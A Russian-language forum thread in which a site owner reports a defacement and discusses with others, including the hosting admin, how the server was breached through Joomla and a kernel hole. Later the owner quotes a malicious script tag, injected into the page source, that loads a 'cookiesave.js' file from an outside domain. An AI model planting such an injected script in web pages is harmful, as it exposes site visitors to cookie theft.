Ломанули сайт

Аватар пользователя tolykot tolykot 6 мая 2011 в 22:53

Ломанули сайт http://photoshopic.com/

H@cked By H3patit and XugurX id uid=0(root) gid=0(root)

Комментарии

Аватар пользователя tolykot tolykot 6 мая 2011 в 23:01

вернул родной index.php сайт завелся
как же получили доступ к файлам? Пасс угнали?

Аватар пользователя Виктор Степаньков ака RxB Виктор Степаньк... 7 мая 2011 в 1:22

"tolykot" wrote:
Виктор, что для опытов нужно?

В личку FTP или SSH-доступ, если подойдёт, то я на примере вашего хостера кое-чего покажу.
Просто у меня есть черновик статьи про один "профессиональный хостинг с первоклассными специалистами", который тут спамился рекламировался и доказывал что он профессиональный и первоклассный, но можно на вашем проверить и написать про него

Аватар пользователя tolykot tolykot 7 мая 2011 в 1:40

завелся сайт
что админ писал "Хакер раскидал 700 тыс файлов на сервере, все файлы найдены и обрабатываются, ненужные удаляются, нужные восстанавливаются из бекапов. Повреждены только файлы index.php и некоторые файлы шаблонов. к счастью это файлы которые очень редко меняются. Как только закончится обработка файлов запускаю сервер. Наберитесь терпения.

Новость 2. Взяли эксплоиты, которые были использованы для взлома, протестировали на новом сервере, ни один из них не сработал. Обновить операционную систему на этом сервере не удастся. Как только восстановление поврежденных файлов закончится запускаем сайты и сразу же приступим к переносу сайтов на другой сервер. При переносе сайтов простоя в их работе не будет."

и еще "Схема очень простая - ломают CMS которая на хостинге лежит, а потом через найденную уязвимость в ядре пролазят. В данном случае взломали 2 сайта с Joomla, после чего запустили вредоностный код."

Аватар пользователя Виктор Степаньков ака RxB Виктор Степаньк... 7 мая 2011 в 1:50

А про то что у админов апач от группы небось работает, они не сказали? Или интерпретатор доступ, да ещё и бинарники выполняются?
И кстати http://www.drupal.ru/node/53665 это тот же хостер? Я тогда смеялся аки конь с их объяснения

Аватар пользователя rudenko rudenko 7 мая 2011 в 5:19

Добрый день, я являюсь администратором хостинга, отвечу для RxB - на хостинге каждый запрос Apache обрабатывает от имени пользователя - владельца сайта. Каждый аккаунт хостинга это отдельный пользователь и отдельная группа. Файлы пользователей не имеют прав на чтение и выполнение от other.

Относительно мнения, что мега дыры закрываются в течении суток - фуфло. Дыра, которая была в ядре линукса в ноябре была закрыта только в ядре 2.6.36, но до сих пор ряд операционных систем используют ядра 2.6.35 как стабильные, лечение дыры - отключение некоторых функций ядра.

Аватар пользователя oboroten oboroten 7 мая 2011 в 16:32

"tolykot" wrote:
долбится юзер root (не существующий)IP - 77.120.23.103

И долго долбиться? (эт мой внешний ип по идее)

Аватар пользователя tolykot tolykot 8 августа 2011 в 9:42

Капец! В исходном коде страницы
<script src="http://yourerating.com/cookiesave.js"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

ломанули что ли? Сейчас я на работе, доступа по FTP нет(((

Аватар пользователя tolykot tolykot 10 ноября 2015 в 11:47

сменил пароль по FTP
лог FTP прилагается

ручками чистил все файлы. Ссыль на скрипт в файлах была где в начале, где в конце, а где и в середине

"tolykot" wrote: